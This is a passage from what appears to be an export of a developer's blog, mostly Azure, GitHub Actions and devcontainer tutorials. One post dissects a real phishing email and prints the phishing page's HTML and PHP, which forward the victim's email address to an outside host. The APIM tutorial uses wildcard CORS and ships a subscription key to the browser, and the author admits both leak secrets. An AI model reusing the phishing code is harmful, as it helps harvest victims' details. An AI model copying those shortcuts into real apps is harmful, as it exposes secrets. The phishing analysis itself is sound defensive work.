appId=$(echo $app | jq -r '.appId') objectId=$(echo $app | jq -r '.id') sp=$(az ad sp create --id $appId -o json) assigneeObjectId=$(echo $sp | jq -r '.id') subscriptionId=... resourceGroupName=... az role assignment create --role contributor --subscription $subscriptionId --assignee-object-id $assigneeObjectId --assignee-principal-type ServicePrincipal --scope /subscriptions/$subscriptionId/resourceGroups/$resourceGroupName credentialName=github-deploy subject=repo:aaronpowell/aaronpowell.github.io:environment:production az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body "{\\"name\\":\\"$credentialName\\",\\"issuer\\":\\"https://token.actions.githubusercontent.com\\",\\"subject\\":\\"repo:organization/repository:environment:production\\",\\"description\\":\\"Deploy from GitHub Actions\\",\\"audiences\\":[\\"api://AzureADTokenExchange\\"]}" echo Values for GitHub secrets: echo Client ID: $appId echo Tenant ID: $(echo $sp | jq -r '.appOwnerOrganizationId') echo Subscription ID: $subscriptionId This script will go through the steps to create the app in Azure AD, setup a Service Principal and then provision the identity to talk to GitHub, before dumping out the three bits of information you’ll need to authenticate the Action with.\nYou’ll need to provide the right subscriptionId and resourceGroupName, and the only other value you may wish to change is subject. For this pipeline, we’ll use GitHub Environments to deploy, which is denoted by environment:<environment name>, where environment name is production. Give that a name and then call the az rest comand to create the credential (this feature is still in preview, in the future there may be a direct Azure CLI command to use).\nNow, plug the three values it outputs into GitHub secrets, so the Action can use them.\nRunning Bicep from GitHub Actions With a step for azure/login setup, the next step needs to run the Bicep template with the azure/arm-deploy Action.\n1 2 3 4 5 6 7 8 9 10 11 12 13 - name: Ensure resource group exists uses: azure/CLI@v1 with: inlineScript: | az group create -g ${{ secrets.RESOURCE_GROUP }} -l ${{ secrets.RESOURCE_GROUP_LOCATION }} - name: Deploy Bicep uses: azure/arm-deploy@v1 with: resourceGroupName: ${{ secrets.RESOURCE_GROUP }} subscriptionId: ${{ secrets.AZURE_SUBSCRIPTION_ID }} template: ./deploy/main.bicep parameters: swaName=${{ secrets.SWA_NAME }} failOnStdErr: false Well, first we’re using azure/CLI to ensure that the resource group exists, and then we’re using azure/arm-deploy to deploy the Bicep template.\nThe path to the main.bicep template is set as an argument to the Action, along with the parameters that it needs. Since we’re using default values for location and sku, we don’t need to pass those in.\nWith this added to your workflow before the action azure/static-web-apps-deploy, you now have Infrastructure as Code for deploying your static web apps.\nConclusion Throughout this post we looked at how to create a simple Bicep template that will deploy a Static Web App, and how to use it from GitHub Actions. We also saw the process for setting up the authentication from GitHub Actions to Azure, using the OIDC connect method.\nNow that this is added, we have a completely reproducable pipeline that can be used to deploy your static web apps, from resource provisioning to deployment, in the case we ever need to start from scratch again.\nYou can check this out in action by looking at the GitHub Actions for my blog which I have refactored to use Bicep (and it only took half a dozen deployments!).\n", "id": "2022-06-29-deploy-swa-with-bicep" }, { "title": "Implementing a Token Store With APIM Authorizations", "url": "https://www.aaron-powell.com/posts/2022-06-16-implementing-a-token-store-with-apim-authorizations/", "date": "Thu, 16 Jun 2022 02:05:27 +0000", "tags": [ "security", "javascript" ], "description": "Let's take a look at making OAuth2 simpler with APIM Authorizations", "content": " In this post, we’re going to take a look at the recently previewed Authorizations feature of Azure API Management (APIM) and see how to setup a React and TypeScript application that uses the Dropbox SDK to upload a file, without needing to handle OAuth token creation.\nWhat is APIM Authorizations Before we dive into creating the application, let’s quickly look at what this feature is.\nIn a connected system, being able to communicate between different Software as a Service (SaaS) platforms is a common task, but often these platforms will use OAuth2 to verify the user identity. This requires undertaking an authentication flow, which is fine if you’re directly using the system, but what if it’s being handled by a background job, like an Azure Function running with a Timer Trigger? Then we need to use alternative authentication workflows, handle expiry of tokens, etc.\nThis can result in a lot of our application code being responsible for managing and storing tokens.\nAnd this is where Authorizations comes in, it is a managed Token Store for your OAuth2 access tokens. Rather than your application having to authenticate, APIM will handle this on your behalf. It also means your application can operate in a lower trust environment, rather than your application needing to know about the client id/client secret of the SaaS provider, it becomes unaware and only relies on the REST API to API Management to get the token back as-needed.\nYou can learn more about Authorizations in APIM on their docs.\nCreating our app The application we’re creating is a data entry form that could be used to capture user information while at an event, a person will enter their information and it’ll generate a file to upload to Dropbox, which could later be ingested by another part of our system.\nLet’s start by generating the new application using vite:\n1 npm create vite@latest my-app -- --template react-ts Next, we’ll start creating the form that we’ll use for data capture, so open the my-app folder in VS Code (or any other editor of your choice) and we’ll add a form to the App.tsx file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 const updateField = ( updater: React.Dispatch<React.SetStateAction<UserInfo>> ) => (e: ChangeEvent<HTMLInputElement>) => updater(userInfo => ({ ...userInfo, [e.target.name]: e.target.value })); function App() { const [userInfo, setUserInfo] = useState<UserInfo>({}); const [submitting, setSubmitting] = useState(false); return ( <div className="App"> <header className="App-header"> <h1>Contoso Lead Capture</h1> <form action="" onSubmit={e => (e.preventDefault(), setSubmitting(true))} > <fieldset> <div> <label htmlFor="firstName">First name</label> <input type="text" name="firstName" id="firstName" placeholder="Aaron" value={userInfo.firstName} onChange={updateField(setUserInfo)} /> </div> <div> <label htmlFor="lastName">Last name</label> <input type="text" name="lastName" id="lastName" placeholder="Powell" value={userInfo.lastName} onChange={updateField(setUserInfo)} /> </div> </fieldset> <fieldset> <div> <label htmlFor="email">Email</label> <input type="email" id="email" name="email" placeholder="foo@email.com" value={userInfo.email} onChange={updateField(setUserInfo)} /> </div> <div> <label htmlFor="phone">Phone</label> <input type="phone" id="phone" name="phone" placeholder="555-555-555" value={userInfo.phone} onChange={updateField(setUserInfo)} /> </div> </fieldset> <fieldset> <button type="submit" disabled={ submitting || !userInfo.firstName || !userInfo.lastName || !userInfo.email || !userInfo.phone } > Submit </button> </fieldset> </form> </header> </div> ); } I’ve also brought in the useState hook so that we can set the values of the various fields as we go along and created a type the represent the data in the form (and put it in a new file called types.ts):\n1 2 3 4 5 6 export type UserInfo = { firstName?: string; lastName?: string; email?: string; phone?: string; }; Hooking up to Dropbox It’s time to hook up with Dropbox, so we’ll need their JavaScript SDK:\n1 npm install --save dropbox And we’ll put the save process in a useEffect hook:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 const [dropboxResponse, setDropboxResponse] = useState< DropboxSaveResponse | undefined >(); useEffect(() => { async function saveToDropbox() { const accessToken = "???"; const dropbox = new Dropbox({ accessToken }); const contents = `${userInfo.firstName},${userInfo.lastName},${userInfo.email},${userInfo.phone}`; const path = `/submissions/${+new Date()}.csv`; const response = await dropbox.filesUpload({ path, contents }); if (response.status !== 200) { setDropboxResponse({ error: true, message: "Failed to upload to dropbox" }); return; } setDropboxResponse({ error: false, message: "Details have been saved. Start again?" }); } if (!submitting) { return; } saveToDropbox(); }, [submitting, userInfo]); I’ve also created a type called DropboxSaveResponse to set on the hook:\n1 2 3 4 export type DropboxSaveResponse = { error: boolean; message: string; }; Our code is ready, well, except for one critical part - how do we get our access token for the Dropbox SDK? Well, we could kick off a Dropbox auth flow, but now everyone has to be able to approve access to the shared Dropbox account, which isn’t ideal. Thankfully, this is exactly what APIM Authorizations is designed for.\nSetting up APIM with Authorizations We’re going to use the Azure Portal to deploy our APIM instance, but as part of the sample repo, we’ve also provided some Bicep templates, so if that’s your preferred approach, head over to the GitHub repo for that guide. Also, if you just want to get deployed, click the Deploy to Azure button below:\nNote: Please be aware this is preview so there may be some changes before the final release.\nHead over the the Azure Portal and create a new APIM instance:\nFill in the required fields and click through the other screens (there’s nothing more that we need to add to the APIM resource beyond the first screen - unless you want to configure APIM for other uses).\nNote: For the preview, you’ll need to use the Developer pricing tier.\nWhen the resource has been created, you should see a new Authorizations (preview) option under the APIs grouping:\nClick on that and we’ll see a list of previously created Authorizations, but since we haven’t got any yet, we’ll start with the Create button to provision it:\nFrom this screen, we can configure the OAuth2 service that we are going to authorize against, and you’ll see all that’s available in the Identity provider list. Since we’re using Dropbox, you’ll need to have created a Dropbox app and obtained the client id and client secret already (if you haven’t done that, head over to Dropbox and set that up).\nWhen filling out this form, note down the Provider name and Authorization name, as we’re going to need those later on.\nAlso, ensure that the Scopes you provide match that in Dropbox. Since we’re going to be uploading files we’re going to need files.metadata.write files.contents.write files.content.read, but match those to your applications needs.\nBefore going to the next screen, copy the Redirect URL and add that to the Dropbox application, so that it can authenticate on the next step:\nOn step two of the process, we need to authenticate APIM against our Dropbox application using the OAuth2 application we’ve created, so click the Login with DropBox button and follow the authorization workflow that it provides.\nThe last stage of setting up the Authorization is configuring the Access Policy the Authorization will use, you can either link this to users/groups within AAD or you can use a managed identity, such as the one provided by APIM. We’re going to use the managed identity:\nFrom the fly-in window select API Management service for the Managed identity and then pick your service from the listed options.\nThis will populate the main window and we can finish the setup.\nAccessing our token APIM is now acting as our Token Store, and will get new OAuth2 tokens for us as required, but we still need to access them, and for that, we’re going to create an API endpoint in API to return it. Head over to the APIs section and we’re going to manually define a HTTP API:\nThe API I’ve defined will be available at the /token route, and since we’ll be calling it from another web host, we need to configure a CORS policy. We can do that by clicking on All operations and opening the code editor for policies to replace the default with:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <policies> <inbound> <cors allow-credentials="false"> <allowed-origins> <origin>*</origin> </allowed-origins> <allowed-methods> <method>GET</method> <method>POST</method> </allowed-methods> </cors> </inbound> <backend> <forward-request /> </backend> <outbound /> <on-error /> </policies> This is defining an inbound policy that allows CORS from all origins (you might want to tighten that up in a production app!) and passes through all requests to the backend without interference.\nNow we can create an operation to the API so that we can get back the token:\nI’m calling the operation Get Dropbox token and making it a HTTP GET at the / URL, which is relative to the path of the API that we’ve defined, meaning it’s a GET request against /token.\nWith that saved, we need to define just what this API will do. Since we want to access the token store that our authorizations use, we’re going to use the get-authorization-context policy on the inbound request:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <policies> <inbound> <base /> <get-authorization-context provider-id="dropbox-demo" authorization-id="auth" context-variable-name="auth-context" ignore-error="false" identity-type="managed" /> <return-response> <set-body>@(((Authorization)context.Variables.GetValueOrDefault(&quot;auth-context&quot;))?.AccessToken)</set-body> </return-response> </inbound> <backend> <base /> </backend> <outbound> <base /> </outbound> <on-error> <base /> </on-error> </policies> The get-authorization-context policy needs two bits of information that we set when we created the Authorization initially, the name of the provider, dropbox-demo, and the name of the Authorization, auth. The policy will then call into our token store, grab the token and we set it as the body using set-body, to return in our response. This is just setting a text/plain response, but you could build up a JSON payload if that was more preferred in your scenario.\nSave the policy, click the Test tab at the top and fire off the request:\nSuccess! We can see in the HTTP response that the response body contains our OAuth2 token that we can can provide to the Dropbox SDK.\nHooking it all up APIM is all configured with the authorizations now so it’s time to integrate with our application.\nFrom the React application we’re going to make a call to the /token API that we created, and you can get the URL from this command:\n1 2 3 4 SUBSCRIPTION_KEY=$(az rest --method post --url /$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.ApiManagement/service/$APIM_NAME/subscriptions/master/listSecrets?api-version=2021-08-01 | jq .primaryKey -r) GATEWAY_URL=$(az apim show --name $APIM_NAME --resource-group $RESOURCE_GROUP --query gatewayUrl --output tsv) echo "$GATEWAY_URL?dropbox-demo/token?subscription-key=$SUBSCRIPTION_KEY" Note: We are going to be including the subscription key in the URL and that key will be exposed via the React app so it can call APIM, meaning you are potentially leaking secrets. In a more robust application you’d likely include an Azure Function which makes the call to Dropbox, rather than doing it in the browser, so your client would POST to Azure Functions and it in turn would retrieve the access token and upload the file. But we’re keeping it in the client for today’s demo.\nTo use this from our React application, create a .env file at the root of your workspace and add it in like so:\n1 VITE_APIM_ENDPOINT=<...> Now we can go back to our App.tsx and update this line:\n1 const accessToken = "???"; To:\n1 2 const accessTokenResponse = await fetch(import.meta.env.VITE_APIM_ENDPOINT); const accessToken = await accessTokenResponse.text(); Start the application with npm run dev, fill out the data in the form and hit submit - you’ll see a call to APIM that gets back the access token and then it’s provided to the Dropbox SDK to upload the file to Dropbox.\nConclusion There we have it, you’ve learnt about a new feature we’ve added to API Management - Authorizations.\nThroughout this post we’ve taken a look at how to setup Authorizations in APIM, in this case we’ve used Dropbox, connected APIM to our Dropbox application to it can request OAuth2 access tokens on our behalf. We then created a policy in APIM that will return the access token via an API call we can make, rather than us having to build our own API from scratch.\nWe also built a React application that can call the API we created in APIM to get back the Dropbox access token from the token store, provide it to the Dropbox SDK and then upload a file to Dropbox, all without the client having to undertake an OAuth2 flow itself.\nYou’ll find the sample of this application on GitHub, including the scripts for provisioning APIM and a Blazor/C# version. To learn more about the Blazor version, check out this article by my colleague Justin Yoo.\nDon’t forget to have a read of the Authorizations in API Management docs and let us know what kinds of things you would find this useful for.\n", "id": "2022-06-16-Implementing-a-Token-Store-with-APIM-Authorizations" }, { "title": "Breaking Down a Phishing Attempt", "url": "https://www.aaron-powell.com/posts/2022-05-10-breaking-down-a-phishing-attempt/", "date": "Tue, 10 May 2022 06:56:11 +0000", "tags": [ "security" ], "description": "A look at a phishing attempt on me today", "content": "Today my wife and I received the following email from our builder:\nWell, more specifically, we received it from the sales consultant at the builder who we did the initial tender through about 2 years ago and haven’t been in contact with since.\nSo, getting an email from them seemed somewhat weird, but at the same time, we’re just about finished with our build so we thought it might be some closing paperwork.\nBut it wasn’t, it was a phishing attack, and a pretty darn impressive one at that. If you look at the email you’ll notice (redacted) email footer with disclaimer, this was all correct details, down to the mobile phone number of the individual and the text in the disclaimer, it all matches with previous emails we’d had.\nThe email came into the joint email account my wife and I share, I didn’t read it but she asked me why she couldn’t access it - she needed the password to the joint account to do so. This triggered a red flag with me so I decided to have a look at it.\nLegit on first pass What really got me about this was just how real the email looked, it’s attempting to mimic the information rights management (IRM) of M365 which allows you to share a document from our SharePoint environment to someone outside of your organisation. It works by sending them back to your M365 tenant where you have to provide an access token and your email (token is emailed separately) to then give you access to the document.\nIt’s really cool tech for allowing a company to share sensitive content to people outside of their organisation in a trusted way, and still hold onto the trust aspect, rather than just emailing attachments which you can’t track ownership of, or be sure they haven’t been intercepted in a person-in-the-middle attack.\nBut it seemed a bit off with the text in the email, Good Day, Please see attached.. This is not the best english and the use of capitalisation seems off, indicating that something isn’t quite right about it.\nTime to snoop.\nWhere’s the link go There’s a big View Message button in the middle, which you’re obviously meant to click, and this is the start of the attack. Hovering over the link it clearly wasn’t right, it was going to https://8097685657-evkpl8.codesandbox.io/?email=.\nI’m pretty confident that M365 IRM isn’t running on codesandbox.io, but let’s take a look at it anyway.\nOk, interesting, a ReCapture challenge and a submit button, that’s not that interesting. I popped the browser devtools and had a look around, still, nothing that interesting, but given it’s on codesandbox, we can have a look at the raw files at https://codesandbox.io/s/8097685657-evkpl8.\nDigging through the code There’s four files in the “app”, a package.json and sandbox.config.json, both of which were clearly just generated from a basic template, then there’s the index.html that we get served:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 <object data="https://contelis.com.br/wp?email=" id="obj" width="100%" height="100%" type="text/html" > Link Expired </object> <script type="text/javascript"> function getUrlVars() { var vars = {}; var parts = window.location.href.replace( /[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) { vars[key] = value; } ); return vars; } var email = window.location.hash.substr(1); if (!email) { var email = getUrlVars()["email"]; document .getElementById("obj") .setAttribute("data", "https://contelis.com.br/wp?email=" + email); } else { document .getElementById("obj") .setAttribute("data", "https://contelis.com.br/wp?email=" + email); } </script> So it’s looking at the email query string and then loading up another website in an <object> tag, which it full screens. This means that the page https://contelis.com.br/wp is really where the code lives.\nInterestingly enough, there’s also a index.php file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php $oslo=rand(); $praga=md5($oslo); $url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; parse_str(parse_url($url, PHP_URL_QUERY)); $domain = explode('@', $email); $domain_check = '@'.strtolower($domain[1]); if(stripos($domain_check, '@hotmail.') !== false || stripos($domain_check, '@outlook.') !== false || stripos($domain_check, '@office365.') !== false){ header('Location: https://'.$praga.'-kve7vl.csb.app'.$email); } else { header('Location: https://'.$praga.'-kve7vl.csb.app'.$email); } ?> It’s been a long time since I’ve written PHP but my understanding of the code is that it looks at the email address, and if it’s a “microsoft” property, you get redirected to one site, otherwise you get directed to a different site, all using the Location header… although if I understand the code right, you end up at the same site regardless, and both sites seem to be on codesandbox as well, as csb.app is the short link that they use.\nFollowing that link lands you at an identical codesandbox by the same author, so I’m unsure exactly what the point of it is, my guess is that it’s only part of a file, maybe the one of contelis.com.br.\nSpeaking of page at contelis.com.br, it’s really simple HTML, all it’s doing it loading up ReCapture and interestingly enough, the actual ReCapture, not some mock up, so you can fail it!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 <!DOCTYPE html> <html> <head> <title></title> <script src="https://www.google.com/recaptcha/api.js" async defer ></script> </head> <body> <center> <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /> <form method="POST" action=""> <div class="form-group"> <div class="g-recaptcha" name="g-recaptcha" data-sitekey="6Lfx39ofAAAAAHjix51F6EBGCmAppT-UVw0CNdQO" ></div> </div> <br /><button style="width: 100px; height: 50px;" type="submit" name="submit" > submit </button> </form> </center> </body> </html> There’s no <input> fields on the page, so you’re not going to be submitting any new data to the server, so my guess is that there’s something server-side that I can’t see, probably storing the value of the email query string. I also do like the use of the <br> tag to add whitespace, plus a <center> tag - HTML at its finest!\nWhat’s the point This is about as far as I was about to dig through and it left me wondering just what the point of this phishing attack was. My guess is that it’s being used to harvest email addresses and verify that they are legit by looking at who clicked through the email, essentially, generating a database of “gullible fools” that would click on this sort of thing.\nBut looking at the email source the query string was never set, meaning that the point of capturing the email by using the information on the click through never did work - it was just not there, so I’m a bit at a loss.\nThe other thing I found fascinating is the level of sophistication in the email, down to the footer with contact details of the original victim and that the email headers suggest it came from the building companies systems. This suggests that it was probably done through a virus on the original victims machine, rather than a random phishing service.\nWe contacted the builder and informed them of the email and a few hours later an email from the CEO went out addressing it and apologising, so I’m glad they acknowledged the problem.\nI’ve also reported the account to codesandbox, so it’ll be up to them to take it down.\nOverall, it was a bit of fun pulling this little attempt at phishing me apart.\n", "id": "2022-05-10-breaking-down-a-phishing-attempt" }, { "title": "Learn GraphQL at NDC Melbourne", "url": "https://www.aaron-powell.com/posts/2022-05-02-learn-graphql-at-ndc-melbourne/", "date": "Mon, 02 May 2022 05:30:23 +0000", "tags": [ "graphql", "public-speaking" ], "description": "Wanting to learn GraphQL? Come join my workshop", "content": "Is GraphQL something that’s been on your backlog to learn? Well, there’s no better time than the present to get to it because as part of NDC Melbourne in June this year I’ll be running a two-day workshop to take you from zero to hero with GraphQL.\nMy sales pitch to you So, what are you going to learn over the two days?\nFirst off, we’ll look at just what GraphQL is and why it’s something worth exploring for your applications. I won’t sugarcoat it, GraphQL won’t be right for everything, so it’s best that we know just when to use it, rather than blindly following technology trends.\nBut then it’s hand-on coding, we’re going to be building a GraphQL server and connecting it to a database (I’ll be using TypeScript, but there’ll be provisions if you want to use .NET or any other language). We’ll look at the terminology and components that come together to make a GraphQL server tick. Once our server is ready we’ll look at how you consume GraphQL at a client, after all, an API is only as useful as the client that consumes it.\nFor the final part of the workshop we’ll explore how to take our sample application to production, exploring topics like security, API access controls, CI/CD, how we avoid creating our own DDoS servers using GraphQL and how to add GraphQL support to existing APIs without having to rewrite them from scratch.\nShould you attend Well, I’m pretty biased on this so the answer is of course yes!\nPersonal biases aside, GraphQL is a very relevant technology and there’s many applications that it’s better suited for than traditional REST APIs, so if you’re looking to explore it, grab a ticket and come learn the in’s and out’s with me.\n", "id": "2022-05-02-learn-graphql-at-ndc-melbourne" }, { "title": "Accessing a Static Web Apps Url From GitHub Actions", "url": "https://www.aaron-powell.com/posts/2022-04-08-accessing-a-swa-url-from-github-actions/", "date": "Fri, 08 Apr 2022 05:49:45 +0000", "tags": [ "javascript", "azure", "devops" ], "description": "Are you using Static Web Apps and wanting to know the URL of the app you deployed in GitHub Actions? Here's how to do it", "content": "I was recently working on a project where I wanted to add some tests using Playwright to perform headless browser tests during the CI/CD pipeline.\nThankfully, my colleague Nitya has already written a blog post on how to do that, which you can read here.\nThis works just fine when the tests are running on the main branch, but I hit a snag with pull requests, because with Static Web Apps we get pre-production environments for pull requests and those are deployed with their own URLs.\nNow we have a problem because in my tests I can’t just have:\n1 2 3 4 5 6 test("basic test", async ({ page }) => { await page.goto("https://bit.ly/recipes-for-aj"); await expect(page).toHaveTitle("Recipes 4 AJ"); await page.locator("text=Tags").click(); }); Because that will always navigate to the production site! So, how can we solve this?\nFinding the URL of a deployment If you’ve looked into the logs of the deployment of a Static Web App you’ll have noticed that the URL is output there, whether it’s the URL with custom domain, or the pre-production environment URL on a PR, so this means that the GitHub Actions are aware of the URL.\nNext stop, azure/static-web-apps-deploy to have a look at how the Action works. Alas it’s a Docker Action, which means we can’t see the internals of it, but that’s not a major problem because we can check out the actions.yaml and see the following:\n1 2 3 outputs: static_web_app_url: description: "Url of the application" Awesome! The Action will actually output the URL for us.\nUsing output across jobs Following Nitya’s pattern, we’re going to create a new job in our workflow to run the Playwright tests:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 jobs: build_and_deploy_job: # snip test: name: "Test site using Playwright" timeout-minutes: 60 needs: build_and_deploy_job runs-on: ubuntu-20.04 steps: - uses: actions/checkout@master - uses: actions/setup-node@v2 with: node-version: '14.x' - name: Install dependencies run: | cd testing npm ci npx playwright install-deps npx playwright install - name: Run Playwright Tests continue-on-error: false working-directory: testing run: | npx playwright test --reporter=html --config playwright.config.js We’ll also update our test to use an environment variable to provide the URL, rather than having it embedded:\n1 2 3 4 5 test("basic test", async ({ page }) => { await page.goto(process.env.SWA_URL); // Be assertive }); To get that as an environment variable we have to first output it from the build_and_deploy_job:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 jobs: build_and_deploy_job: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest name: Build and deploy website outputs: static_web_app_url: ${{ steps.swa.outputs.static_web_app_url }} steps: - uses: actions/checkout@v3 with: submodules: true - name: Build And Deploy id: swa # snip The important part is static_web_app_url: ${{ steps.swa.outputs.static_web_app_url }} in which were telling GitHub Actions that the step swa will have an output that we want to make an output of this job.\nWe can then use it in our test job like so:\n1 2 3 4 5 6 7 8 9 test: name: "Test site using Playwright" timeout-minutes: 60 needs: build_and_deploy_job runs-on: ubuntu-20.04 env: SWA_URL: ${{ needs.build_and_deploy_job.outputs.static_web_app_url }} steps: # snip The snippet ${{ needs.build_and_deploy_job.outputs.static_web_app_url }} tells GitHub Actions to look at the dependent job (needs.build_and_deploy_job) outputs and find the one we want and set it as an environment variable.\nAnd just like that, you no longer need to have hard-coded URLs for your tests.\nConclusion By leveraging output variables from GitHub Action steps and jobs we’re able to simplify our GitHub workflows when it comes to doing something like automated tests using Playwright.\nTo show this in action I’ve created a PR for Nitya’s sample application so you can see the changes that I made and how the GitHub Actions run now looks.\n", "id": "2022-04-08-accessing-a-swa-url-from-github-actions" }, { "title": "The Ultimate Web Dev Environment", "url": "https://www.aaron-powell.com/posts/2022-03-04-the-ultimate-web-dev-environment/", "date": "Fri, 04 Mar 2022 00:25:57 +0000", "tags": [ "javascript", "webdev", "serverless" ], "description": "Let's setup the ultimate local dev experience for making web applications.", "content": "This is a long post and I’ve presented on this topic, so if you prefer to watch a video rather than reading, scroll to the end and check out the video.\nThere’s no denying that I am a huge fan of Static Web Apps (SWA), I have a lot of posts about it on my blog. But one thing I’m always trying to do is to work out how we can make it easier to do development.\nFor today’s blog post, I want to look at how we can create the ultimate dev environment for web development, one where you can clone a Git repository, open in VS Code and launch it with all debuggers attached and ready to go. Naturally, we’re going to have some Static Web Apps specific things in here, but most of it will be applicable for a wide range of web applications.\ndevcontainer, storage and API’s We’re going to start at the bottom, where we can store data, and since we’re using Azure Functions for storage, we want an easy way in which we can store data without having to run a cloud service.\nThe easiest way to do data storage with Azure Functions is with Cosmos DB as it has provided bindings, and as I showed in a previous post there’s a new emulator we can run in a Docker container.\nWe’re going to build on the ideas of that previous post but make it a bit better for the web (so I won’t repeat the process for adding the Cosmos DB emulator container).\nThe web container We need a container in which we can run SWA, as well as the devcontainer.json file, but since we’re going to need a container with the database, we’ll leverage the Docker compose remote container patter. We can scaffold that up using the Remote-Containers: Add Development Container Configuration Files from the Command Pallette and choosing Docker Compose (you may need to go through Show All Definitions first to get this one). Once they are scaffolded, open the Dockerfile and ensure that we’ve got the right base image:\n1 FROM mcr.microsoft.com/azure-functions/python:4-python3.9-core-tools This container contains the .NET Core runtime (needed by the Azure Functions runtime when using bindings like CosmosDB), the Azure Functions CLI tool, the Azure CLI and Python (Python is needed for the Azure CLI).\nLike last time, we’ll leave the boilerplate code in for setting up the inter-container communication, but we need to install Node.js and the best way to do that for a devcontainer is using the Node.js install script, which we’ll add to the library-scripts folder. We’ll also add a step to install the SWA CLI, so that we can use that in our container (this was adapted from the SWA devcontainer).\nWith everything setup, our Dockerfile will look like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 FROM mcr.microsoft.com/azure-functions/python:4-python3.9-core-tools # [Option] Install zsh ARG INSTALL_ZSH="true" # [Option] Upgrade OS packages to their latest versions ARG UPGRADE_PACKAGES="false" # [Option] Enable non-root Docker access in container ARG ENABLE_NONROOT_DOCKER="true" # [Option] Use the OSS Moby CLI instead of the licensed Docker CLI ARG USE_MOBY="true" # Install needed packages and setup non-root user. Use a separate RUN statement to add your # own dependencies. A user of "automatic" attempts to reuse an user ID if one already exists. ARG USERNAME=automatic ARG USER_UID=1000 ARG USER_GID=$USER_UID ARG NODE_VERSION="lts/*" ENV NVM_DIR="/usr/local/share/nvm" \\ NVM_SYMLINK_CURRENT=true \\ PATH="${NVM_DIR}/current/bin:${PATH}" COPY library-scripts/*.sh /tmp/library-scripts/ RUN apt-get update \\ && /bin/bash /tmp/library-scripts/common-debian.sh "${INSTALL_ZSH}" "${USERNAME}" "${USER_UID}" "${USER_GID}" "${UPGRADE_PACKAGES}" "true" "true" \\ # Use Docker script from script library to set things up && /bin/bash /tmp/library-scripts/docker-debian.sh "${ENABLE_NONROOT_DOCKER}" "/var/run/docker-host.sock" "/var/run/docker.sock" "${USERNAME}" \\ # Install Node.js && bash /tmp/library-scripts/node-debian.sh "${NVM_DIR}" \\ # Install SWA CLI && su vscode -c "umask 0002 && . /usr/local/share/nvm/nvm.sh && nvm install ${NODE_VERSION} 2>&1" \\ && su vscode -c "umask 0002 && npm install --cache /tmp/empty-cache -g @azure/static-web-apps-cli" \\ # Clean up && apt-get autoremove -y && apt-get clean -y \\ && rm -rf /var/lib/apt/lists/* /tmp/library-scripts/ # Setting the ENTRYPOINT to docker-init.sh will configure non-root access # to the Docker socket. The script will also execute CMD as needed. ENTRYPOINT [ "/usr/local/share/docker-init.sh" ] CMD [ "sleep", "infinity" ] Note: Just remember to change the remoteUser of the devcontainers.json file from vscode to node, as that’s the user the base image created.\nSetting up the devcontainer Since we want to get up and running with as few additional steps as possible, we’ll take advantage of the postCreateCommand in the devcontainer.json file. This option allows us to run a command, like npm install, but we’re going to take it a step further and write a custom shell script to run in the container that will install the web packages, the API packages and setup our CosmosDB connection locally.\nCreate a new file called ./devcontainer/setup.sh and start with installing the right version of Node.js and the packages:\n1 2 3 4 5 6 7 #/bin/sh . ${NVM_DIR}/nvm.sh nvm install --lts npm ci cd api npm ci cd .. I’ve used npm ci here, rather than npm install, mostly to suppress a lot of the verbosity in the output during install, but that’s the only reason.\nNext, we’ll check if we can access the CosmosDB container, and if we can, get the connection information for the API’s local.settings.json file:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 if ping -c 1 cosmos &> /dev/null then echo Cosmos emulator found echo Preping emulator if [ ! -f "./api/local.settings.json" ] then sleep 5s curl --insecure -k https://cosmos:8081/_explorer/emulator.pem > ~/emulatorcert.crt sudo cp ~/emulatorcert.crt /usr/local/share/ca-certificates/ sudo update-ca-certificates ipaddr=$(ping -c 1 cosmos | grep -oP '\\(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\)' | sed -n 's/(//p' | sed -n 's/)//p' | head -n 1) key=$(curl -s https://$ipaddr:8081/_explorer/quickstart.html | grep -Po 'value="(?![Account]|[https]|[mongo])(.*)"' | sed 's/value="//g' | sed 's/"//g') echo "{ \\"IsEncrypted\\": false, \\"Values\\": { \\"FUNCTIONS_WORKER_RUNTIME\\": \\"node\\", \\"AzureWebJobsStorage\\": \\"\\", \\"StartupAdventurer_COSMOSDB\\": \\"AccountEndpoint=https://$ipaddr:8081/;AccountKey=$key;\\", \\"SHORT_URL\\": \\"http://localhost:4820\\" } }" >> ./api/local.settings.json fi fi Just a reminder, this post doesn’t cover the addition of the Cosmos DB emulator, check out my previous post for that.\nOk, this is a long and ugly script file, so let’s break down what it does.\nFirst, it’ll check to see if it can find the container, using the name we’ve said the container should be in our Docker Compose file, cosmos. If it responds to ping, we can assume that it’s the one we want to use.\nNext, we’ll check for the api/local.settings.json file, because if it’s there, we don’t want to override it (you might be testing against a remote Cosmos instance), but assuming it isn’t there we’ll sleep for 